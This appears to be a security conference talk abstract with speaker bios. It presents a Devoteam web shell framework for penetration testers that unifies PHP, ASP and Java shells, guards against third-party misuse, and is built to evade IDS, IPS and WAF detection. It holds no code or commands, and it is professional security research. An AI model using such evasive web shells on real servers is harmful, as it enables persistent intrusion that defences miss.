Presentation Title WebShells: A Framework for Penetration Testing
It is imperative for a pentester to have a reliable tool to maintain the control and elevate the privileges on a compromised server. WebShell is this type of tool: being uploaded to the server, it is accessed via a web interface supplying the pentester with functionalities such us command system, file manager, file upload and download etc.
Because servers do not necessarily support the same language, the WebShell should be implemented in a language understandable by a server. Since the most popular web languages are PHP, ASP.NET, Java, the majority of WebShells are implemented on these three languages. Many various PHP, ASP, et Java WebShells could be found on the Internet. Normally they are conceived by amateurs or a community of amateurs often driven by the malicious purposes like site defacement, spamming or vulnerability exploitation. So in the most cases their functionality is not really adapted for the pentester needs and their utilization doesn’t seem safe. In fact, many WebShells use third party sites to send all sensitive information collected on the compromised server, hide malicious code in their code source or upload malicious code from third party sites. Therefore one should be vigilant when using this kind of tool and should verify what the code is doing line by line.
The Devoteam audit security team used many different WebShells developed independently one from another either by the team itself, either adopted from existing tools. In reality every pentester used his set of PHP, ASP and Java shells. This use was not at all optimal because some of these shells missed certain functionality, others were not working well for certain type of server or were blocked by IPS. Hence one of the purposes of our work was the centralization and homogenization of these tools to provide our team with a unique framework that they can use during penetration tests. Another purpose was to design a solution to bypass the intrusion detection systems like IDS, IPS or WAF.
In addition the problem of protection of the WebShell framework was also considered. It was important to ensure that only the pentester could execute it on the compromised server so that WebShell could not be turned away by a third person and used for malicious purposes. The most popular protection in existing WebShells is provided by the means of a password. However somebody who has access to a compromised server and to the WebShell code source, could easily get advantage of it because password or its hash is usually written in the code source. In the case of a hash, if malevolent person can edit the source code, he or she could modify the present hash or event delete the authentification mechanism.
Our approach consisted of developing a framework thoroughly protected against third party unauthorized access, supplying the unique interface to the different types of WebShell (PHP, ASP, Java) and undetectable by IDS/IPS/WAF. In this talk we will present at first the state of art of existing WebShells, protection and obfuscation methods, then we will discuss our approach and demonstrate the proof of concept on the application that we have developed at Devoteam.
Note: Presenting with Joffrey Czarny
About Elena Kropochkina
Elena Kropochkina begins her professional career in Devoteam Audit Security team. She was graduated by Ecole Polytechnique and Telecom ParisTech with a M.S. in Computer Science. She is specialized in IT Security and Artificial Intelligence.
About Joffrey Czarny
Joffrey Czarny, working for Devoteam Security Business Unit (FR). Since 2001, Joffrey is a pentester, he has released advisories on VoIP Cisco products and spoken at various security-focused conferences (Wireless Conference at Infosec Paris and Wireless Workshop at Hack.lu 2005, VoIP at Hack.lu 2007/2008 and ITunderground 2008/2009). On his site, www.insomnihack.net, he maintains the Elsenot project (“http://insomnihack.net/elsenot/”) and posts video tutorials and tools on several security aspects.